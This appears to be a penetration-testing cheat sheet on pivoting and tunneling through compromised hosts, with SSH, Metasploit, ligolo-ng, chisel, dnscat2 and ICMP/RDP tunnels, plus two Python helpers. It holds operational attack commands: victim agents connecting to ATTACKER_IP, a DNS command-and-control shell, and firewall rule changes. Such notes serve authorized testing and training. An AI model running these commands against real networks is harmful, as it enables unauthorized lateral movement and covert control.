# Pivoting & Tunneling

## SSH

`client`: Where the ssh command is executed. \
`server`: Target of the ssh connection.

On Windows the OpenSSH client lives in `%systemdrive%\Windows\System32\OpenSSH` (check with `where ssh`).

{% tabs %}
{% tab title="Local" %}
Maps a local client port to a port on a target that is reachable from the server.

{% code overflow="wrap" %}

```bash
ssh -N -L [<C_IP>:]<C_PORT>:<S_TARGET_IP>:<S_TARGET_PORT> <S_USER>@<S_IP>
```

{% endcode %}

*(`-L` can be repeated to forward multiple ports)*
{% endtab %}

{% tab title="Dynamic" %}
Maps a local client port to the server. That port acts as a SOCKS proxy, so packets sent through it leave from the server.

{% code overflow="wrap" %}

```bash
ssh -N -D [<C_IP>:]<C_PORT> <S_USER>@<S_IP>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
vim /etc/proxychains[4].conf
# socks4 127.0.0.1 <C_PORT>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo proxychains[4] <COMMAND> 
```

{% endcode %}

*(e.g. nmap, msfconsole)*
{% endtab %}

{% tab title="Remote" %}
Maps a port on the server to a port on a target that is reachable from the client.

{% code overflow="wrap" %}

```bash
ssh -N -R [<S_IP>:]<S_PORT>:<C_TARGET_IP>:<C_TARGET_PORT> <S_USER>@<S_IP>
```

{% endcode %}
{% endtab %}

{% tab title="Dynamic Remote" %}
Maps a server port to the client. That port acts as a SOCKS proxy, so packets sent through it leave from the client.

{% code overflow="wrap" %}

```bash
ssh -N -R [<S_IP>:]<S_PORT> <S_USER>@<S_IP>
```

{% endcode %}
{% endtab %}

{% tab title="Note" %}
`-N`: Do not execute a remote command, just hold the tunnel open.\
`0.0.0.0`: Bind on all interfaces.

If you are using the "Remote" technique and the target has to SSH into your machine:

* `sudo systemctl start ssh`
* Set `PasswordAuthentication` to `yes` in `/etc/ssh/sshd_config`
* Use very secure passwords for the accounts
{% endtab %}
{% endtabs %}

## Metasploit

{% tabs %}
{% tab title="Route" %}
Pivoting only inside metasploit.\
Routes traffic to other subnets through meterpreter sessions (i.e. via compromised hosts).

{% code overflow="wrap" %}

```bash
post/multi/manage/autoroute  # set network and session
```

{% endcode %}

Or

{% code overflow="wrap" %}

```bash
route add <NETWORK> <SESSION>
```

{% endcode %}

Or, in Meterpreter:

{% code overflow="wrap" %}

```bash
run autoroute -s <NETWORK>
```

{% endcode %}
{% endtab %}

{% tab title="Socks Proxy" %}
Pivoting for tools outside metasploit.\
Maps a local port to metasploit. That port acts as a SOCKS proxy, so packets sent through it are handled by the routes defined in metasploit.

{% code overflow="wrap" %}

```bash
# First set a route (see the "Route" tab)
```

{% endcode %}

{% code overflow="wrap" %}

```bash
auxiliary/server/socks_proxy   # set VERSION (4a or 5) and SRVPORT
```

{% endcode %}

{% code overflow="wrap" %}

```bash
vim /etc/proxychains[4].conf
# socks4 127.0.0.1 <PORT>   (use socks5 if VERSION is 5)
```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo proxychains[4] <COMMAND>
```

{% endcode %}

*(e.g. nmap)*
{% endtab %}

{% tab title="Port Forwarding" %}
In meterpreter you can define both a Local and a Remote port forwarding (see the SSH section above).

Local

{% code overflow="wrap" %}

```bash
portfwd add -l <C_PORT> -p <S_TARGET_PORT> -r <S_TARGET_IP>
```

{% endcode %}

Remote

{% code overflow="wrap" %}

```bash
portfwd add -R -l <C_TARGET_PORT> -p <S_PORT> -L <C_TARGET_IP>
```

{% endcode %}
{% endtab %}
{% endtabs %}

## Other

### Simple Port Forwarding (single-host)

{% tabs %}
{% tab title="Linux" %}
Define the listening port and the destination to forward to.

{% code overflow="wrap" %}

```bash
socat TCP4-LISTEN:<PORT>,fork TCP4:<TARGET_IP>:<TARGET_PORT>
```

{% endcode %}
{% endtab %}

{% tab title="Windows" %}
Define the listening port and the destination to forward to.\
Requires administrator privileges.

{% code overflow="wrap" %}

```powershell
netsh.exe interface portproxy add v4tov4 listenport=<S_PORT> listenaddress=0.0.0.0 connectport=<TARGET_PORT> connectaddress=<TARGET_IP>
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
netsh.exe interface portproxy del v4tov4 listenport=<S_PORT> listenaddress=0.0.0.0
```

{% endcode %}

To view

{% code overflow="wrap" %}

```powershell
netsh.exe interface portproxy show [v4tov4 or all]
```

{% endcode %}

***N.B.*** *create a hole in the firewall if there is one*

{% code overflow="wrap" %}

```powershell
netsh.exe advfirewall firewall add rule name="<NAME_RULE>" protocol=TCP dir=in localip=<IP> localport=<PORT> action=allow
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
netsh.exe advfirewall firewall delete rule name="<NAME_RULE>"
```

{% endcode %}
{% endtab %}
{% endtabs %}

### [sshuttle](https://github.com/sshuttle/sshuttle)

It allows you to define on the local machine routes to certain subnets reachable from a host, via an ssh tunnel to that host. It therefore eliminates the need to configure proxychains.

{% code overflow="wrap" %}

```bash
sudo sshuttle -r <USER>@<IP>:<PORT_SSH> <NETWORK> 
```

{% endcode %}

{% code overflow="wrap" %}

```bash
<COMMAND_TO_NETWORK>   
```

{% endcode %}

*No proxychains needed, but it requires root on the SSH client and Python 3 on the SSH server.*

### [Plink](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)

On Windows before OpenSSH, [PuTTY](https://www.putty.org/) and its command-line-only counterpart [Plink](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html) were used.\
Plink has much of the functionality offered by ssh.

{% tabs %}
{% tab title="Remote" %}
{% code overflow="wrap" %}

```powershell
plink.exe -ssh -R <S_PORT>:<C_TARGET_IP>:<C_TARGET_PORT> <USER>@<S_IP>
```

{% endcode %}
{% endtab %}

{% tab title="Dynamic" %}
{% code overflow="wrap" %}

```powershell
plink.exe -ssh -D 9050 <USER>@<IP>
```

{% endcode %}

Download [Proxifier](https://www.proxifier.com/), portable version *(like proxychains, but for Windows)*.

Set new proxy server `socks5` to `127.0.0.1:9050`

{% code overflow="wrap" %}

```powershell
<COMMAND>
```

{% endcode %}
{% endtab %}

{% tab title="Note" %}
If we cannot interact with the running shell:

{% code overflow="wrap" %}

```powershell
-pw <PASSWORD>   # supply the password on the command line
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
cmd.exe /c echo y | plink.exe -ssh ...   # auto-accept the host key by piping "y"
```

{% endcode %}
{% endtab %}
{% endtabs %}

## Tunneling

### [ligolo-ng](https://github.com/Nicocha30/ligolo-ng)

{% code overflow="wrap" %}

```bash
apt install ligolo-ng
```

{% endcode %}

**Proxy** on Attacker machine.\
**Agent** on Victim machine.

{% tabs %}
{% tab title="Attacker" %}
{% code overflow="wrap" %}

```bash
sudo ./proxy -selfcert
# note the ATTACKER_IP:ATTACKER_PORT the proxy listens on; the agent connects there
# > help
```

{% endcode %}

Connect the victim to the server

{% code overflow="wrap" %}

```bash
> session
> autoroute
```

{% endcode %}

<details>

<summary>Ligolo-ng &lt; v0.6</summary>

{% code overflow="wrap" %}

```bash
sudo ./proxy -selfcert [-laddr <MY_IP>:<MY_PORT>]
# note the ATTACKER_IP:ATTACKER_PORT the proxy listens on; the agent connects there
# > help
```

{% endcode %}

Create a tun interface on the Proxy Server (C2)

{% code overflow="wrap" %}

```bash
sudo ip tuntap add user <your_username> mode tun ligolo
sudo ip link set ligolo up
```

{% endcode %}

Connect the victim to the server and select the session

{% code overflow="wrap" %}

```bash
> session
> <ID>
> ifconfig
```

{% endcode %}

Setup routing

{% code overflow="wrap" %}

```bash
sudo ip route add <ROUTE/MASK> dev ligolo
```

{% endcode %}

{% code overflow="wrap" %}

```bash
> start [--tun <NAME_TUN>]
> stop
```

{% endcode %}

</details>

<details>

<summary>Ligolo-ng >= v0.6</summary>

{% code overflow="wrap" %}

```bash
sudo ./proxy -selfcert
# note the ATTACKER_IP:ATTACKER_PORT the proxy listens on; the agent connects there
# > help
```

{% endcode %}

Create a tun interface on the Proxy Server (C2)

{% code overflow="wrap" %}

```bash
> interface_create --name "<NAME>"
```

{% endcode %}

Connect the victim to the server and select the session

{% code overflow="wrap" %}

```bash
> session
> <ID>
> ifconfig
```

{% endcode %}

Start the tunneling

{% code overflow="wrap" %}

```bash
> tunnel_start --tun <NAME>
```

{% endcode %}

Setup routing

{% code overflow="wrap" %}

```bash
> interface_add_route --name <NAME> --route <ROUTE/MASK>
```

{% endcode %}

</details>
{% endtab %}

{% tab title="Victim" %}
Connect to the attacker server

{% code overflow="wrap" %}

```bash
./agent.exe -connect <ATTACKER_IP>:<ATTACKER_PORT> -ignore-cert
```

{% endcode %}
{% endtab %}

{% tab title="Listener" %}
`PROXY --> AGENT1 --> AGENT2 --> ?`

You can listen to ports on the *agent* and *redirect* connections to your control/proxy server.

{% code overflow="wrap" %}

```bash
listener_add --addr <AGENT_IP>:<AGENT_PORT> --to <PROXY_IP>:<PROXY_PORT> --tcp
```

{% endcode %}

{% code overflow="wrap" %}

```bash
> listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
```

{% endcode %}

Useful when we need to set up a reverse shell or something else from the second target (`AGENT2`) in the network that is not directly reachable.

If we want to do another pivoting from the second target machine (`AGENT2`), we just need to load the agent, reconnect to the proxy server via the set listener, set new tun *(ex. ligolo2)* and add routing (see [here](https://www.youtube.com/watch?v=LiaBVuz2B4o\&ab_channel=redfire359)).
{% endtab %}

{% tab title="Note !" %}
Because the *agent* runs without privileges, it cannot forward raw packets: when you run an nmap SYN scan through the tunnel, the agent performs a TCP connect() instead.\
When using *nmap*, use `--unprivileged` or `-PE` to avoid false positives.
{% endtab %}
{% endtabs %}

### [chisel](https://github.com/jpillora/chisel)

It performs TCP/UDP pivoting and tunneling, transported over **HTTP** and encrypted internally via SSH.\
Being hidden under HTTP it can bypass some restrictions.

On **Attacker**

{% code overflow="wrap" %}

```bash
chisel server -p <PORT> --reverse --socks5 
```

{% endcode %}

On **Target**

{% code overflow="wrap" %}

```bash
chisel client <SERVER_IP:PORT> <REMOTE> [<REMOTE>]
```

{% endcode %}

`<REMOTE>`:

{% tabs %}
{% tab title="C -> S" %}

```
<C_IP>:<C_PORT>:<S_TARGET_IP>:<S_TARGET_PORT>
```

{% endtab %}

{% tab title="S -> C" %}

```
R:<S_IP>:<S_PORT>:<C_TARGET_IP>:<C_TARGET_PORT>
```

{% endtab %}

{% tab title="Port Forwarding" %}

```
[R:]<PORT>:<PORT>
```

{% endtab %}

{% tab title="Dynamic" %}

```
[R:]<PORT>:socks
```

Add the port to proxychains

{% code overflow="wrap" %}

```bash
vim /etc/proxychains[4].conf
socks5 127.0.0.1 <PORT>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
proxychains[4] <COMMAND>
```

{% endcode %}
{% endtab %}
{% endtabs %}
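The `<REMOTE>` forms above hide the defaults chisel fills in (a bare port listens on all interfaces, the local port defaults to the remote port, `socks` binds 127.0.0.1:1080). As an added example, not chisel's own code, this helper expands a remote string into the listener it opens and where the traffic exits, using the page's C (chisel client) / S (chisel server) naming; it mirrors chisel's back-to-front token rule and the defaults from the chisel README, and does not handle bracketed IPv6 or `stdio` remotes.

```python
def parse_chisel_remote(remote):
    """Expand a chisel <REMOTE> into {reverse, proto, socks, listen, exit}.
    reverse=True: the listener is on the chisel *server* (attacker side) and traffic
    exits from the client (the compromised host); otherwise the listener is on the
    client and traffic exits from the server. Mirrors chisel's back-to-front rule
    (a numeric token is a port, anything else a host); not chisel's own code."""
    spec = remote.strip()
    reverse = spec.startswith("R:")
    if reverse:
        spec = spec[2:]
    proto = "tcp"
    if spec.endswith("/udp"):                       # optional protocol suffix
        spec, proto = spec[:-4], "udp"
    parts = spec.split(":")
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"bad remote: {remote!r}")
    socks = parts[-1] == "socks"                    # needs `chisel server --socks5`
    if socks:
        parts = parts[:-1]
    lhost = lport = rhost = rport = None
    for tok in reversed(parts):                     # remote fields are filled first
        if tok.isdigit():
            if not socks and rport is None:
                rport = lport = int(tok)            # local-port defaults to remote-port
            else:
                lport = int(tok)
        elif not socks and rhost is None:
            rhost = tok
        else:
            lhost = tok
    if socks:
        return {"reverse": reverse, "proto": proto, "socks": True,
                "listen": (lhost or "127.0.0.1", lport or 1080), "exit": None}
    if rport is None:
        raise ValueError(f"missing port in remote: {remote!r}")
    return {"reverse": reverse, "proto": proto, "socks": False,
            "listen": (lhost or "0.0.0.0", lport),
            "exit": (rhost or "127.0.0.1", rport)}  # bare port = far side's loopback

def describe(remote):
    """One-line summary in the page's C (chisel client) / S (chisel server) terms."""
    r = parse_chisel_remote(remote)
    near, far = ("S", "C") if r["reverse"] else ("C", "S")
    bind = f"{r['listen'][0]}:{r['listen'][1]}/{r['proto']} on {near}"
    if r["socks"]:
        return f"SOCKS5 proxy listening at {bind}; connections leave from {far}"
    return f"{bind} -> {r['exit'][0]}:{r['exit'][1]} as reached from {far}"
```

Feeding a chisel client command line recovered during triage through `describe()` shows at a glance which side listens and which internal host becomes reachable.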

### [dnscat2](https://github.com/iagox86/dnscat2)

**DNS**-based encrypted command-and-control channel.\
A dnscat2 server runs on an authoritative name server for a particular domain (or, as in our case, a dummy DNS server is created), while the client, configured to send queries for that domain, runs on the compromised machine.

On **Attacker** (Server)

{% code overflow="wrap" %}

```bash
sudo apt install dnscat2
```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo dnscat2-server --dns host=<IP>,port=53,domain=<DOMAIN>
# note the pre-shared secret <SECRET> printed at startup
```

{% endcode %}

On **Target** (Client)

Download compiled from [HERE](https://downloads.skullsecurity.org/dnscat2/)

{% code overflow="wrap" %}

```bash
./dnscat --dns server=<IP>,port=53,domain=<DOMAIN> --secret=<SECRET>
```

{% endcode %}

Or with [Windows PowerShell Script](https://github.com/lukebaggett/dnscat2-powershell)

{% code overflow="wrap" %}

```powershell
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver <IP> -Domain <DOMAIN> -PreSharedSecret <SECRET> -Exec cmd
```

{% endcode %}

Once connected, from **Attacker**

```bash
?
<COMMAND> --help
windows         # list sessions and their IDs
window -i <ID>  # interact with a session (shell)
```

### [ptunnel-ng](https://github.com/utoni/ptunnel-ng)

Communication channel encapsulated in **ICMP** packets.\
Requires administrator privileges.

Installation

* `.exe` for Windows [HERE](https://github.com/utoni/ptunnel-ng/releases)

{% code overflow="wrap" %}

```bash
git clone https://github.com/utoni/ptunnel-ng.git && cd ptunnel-ng
sudo ./autogen.sh
cd src
```

{% endcode %}

On **Target** (Server)

{% code overflow="wrap" %}

```bash
sudo ./ptunnel-ng -r<SERVER_IP> -R22
```

{% endcode %}

On **Attacker** (Client)

{% code overflow="wrap" %}

```bash
sudo ./ptunnel-ng -p<SERVER_IP> -l2222 -r<SERVER_IP> -R22
```

{% endcode %}

{% tabs %}
{% tab title="Local" %}
{% code overflow="wrap" %}

```bash
ssh -p2222 -l<USER> 127.0.0.1
```

{% endcode %}
{% endtab %}

{% tab title="Dynamic" %}
{% code overflow="wrap" %}

```bash
ssh -D 9050 -p2222 -l<USER> 127.0.0.1
```

{% endcode %}

{% code overflow="wrap" %}

```bash
vim /etc/proxychains[4].conf
# socks4 127.0.0.1 9050
```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo proxychains[4] <COMMAND> 
sudo proxychains[4] nmap <TARGET_IP_FROM_SERVER>
```

{% endcode %}
{% endtab %}
{% endtabs %}

### [SocksOverRDP](https://github.com/nccgroup/SocksOverRDP)

Allows tunnelling and pivoting between Windows systems via **RDP**.\
Requires administrator privileges.

On **Attacker** (Client), with System PowerShell

{% code overflow="wrap" %}

```powershell
regsvr32.exe SocksOverRDP-Plugin.dll
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
mstsc.exe # connect to Target1
```

{% endcode %}

Download [Proxifier](https://www.proxifier.com/), portable version *(like proxychains but for windows).*

Set new proxy server `socks5` to `127.0.0.1:1080`

On **Target1**, with System PowerShell

{% code overflow="wrap" %}

```powershell
SocksOverRDP-Server.exe
```

{% endcode %}

On **Attacker**

{% code overflow="wrap" %}

```powershell
mstsc.exe # connect to Target2 through the Target1 pivot
```

{% endcode %}

## Warning

* Through proxychains only a full TCP connect scan works (`nmap -sT`); proxychains only hooks connect(), so SYN scans and ICMP are not proxied.
* Windows Defender blocks ICMP, so the traditional ping host discovery fails: skip it (`nmap -Pn`).
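Every "Dynamic" tab on this page (ssh `-D`, metasploit `socks_proxy`, chisel `socks`, ptunnel-ng) ends in a SOCKS port that proxychains talks to, and the usual failure is a version mismatch (`socks4` line against a SOCKS5-only port) or a route that does not actually reach the internal host. As an added example, not from any of those projects, this probe completes the SOCKS5 greeting and a CONNECT to a chosen internal host and reports the RFC 1928 reply code, so the pivot can be checked before running anything through it; the fake server at the bottom is a constructed stand-in used only to run it offline.

```python
import socket
import threading

REPLY = {0: "succeeded", 1: "general SOCKS failure", 2: "not allowed by ruleset",
         3: "network unreachable", 4: "host unreachable", 5: "connection refused",
         6: "TTL expired", 7: "command not supported", 8: "address type unsupported"}

def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection early")
        buf += chunk
    return buf

def socks5_connect_probe(proxy, target_host, target_port, timeout=5.0):
    """No-auth greeting + CONNECT through proxy=(host, port); returns (code, text).
    A SOCKS4-only endpoint fails the greeting here instead of silently inside nmap."""
    with socket.create_connection(proxy, timeout=timeout) as s:
        s.sendall(b"\x05\x01\x00")                       # VER=5, 1 method, NO AUTH
        ver, method = _recv_exact(s, 2)
        if ver != 5 or method != 0:
            raise ValueError(f"not a no-auth SOCKS5 proxy (ver={ver}, method={method})")
        name = target_host.encode("idna")                # ATYP=3: the pivot resolves it
        s.sendall(b"\x05\x01\x00\x03" + bytes([len(name)]) + name
                  + target_port.to_bytes(2, "big"))      # CMD=1 CONNECT
        _ver, code, _rsv, atyp = _recv_exact(s, 4)
        addr_len = {1: 4, 4: 16}.get(atyp) or _recv_exact(s, 1)[0]
        _recv_exact(s, addr_len + 2)                     # drain BND.ADDR + BND.PORT
        return code, REPLY.get(code, "unknown")

def start_fake_socks5(reply_code):
    """Constructed stand-in for a pivot that answers every CONNECT with reply_code.
    Returns the 127.0.0.1 port it listens on; for offline testing only."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    def serve():
        conn, _ = srv.accept()
        with conn, srv:
            _recv_exact(conn, 3)                         # greeting
            conn.sendall(b"\x05\x00")                    # pick NO AUTH
            atyp = _recv_exact(conn, 4)[3]
            _recv_exact(conn, {1: 4, 4: 16}.get(atyp) or _recv_exact(conn, 1)[0])
            _recv_exact(conn, 2)                         # DST.PORT
            conn.sendall(b"\x05" + bytes([reply_code]) + b"\x00\x01" + bytes(6))
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]
```

Against a real pivot, call `socks5_connect_probe(("127.0.0.1", <C_PORT>), "<internal host>", <port>)`; a reply other than 0 names the reason the route fails, and a `ValueError` means the proxychains line needs `socks4` rather than `socks5` (or the other way round).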
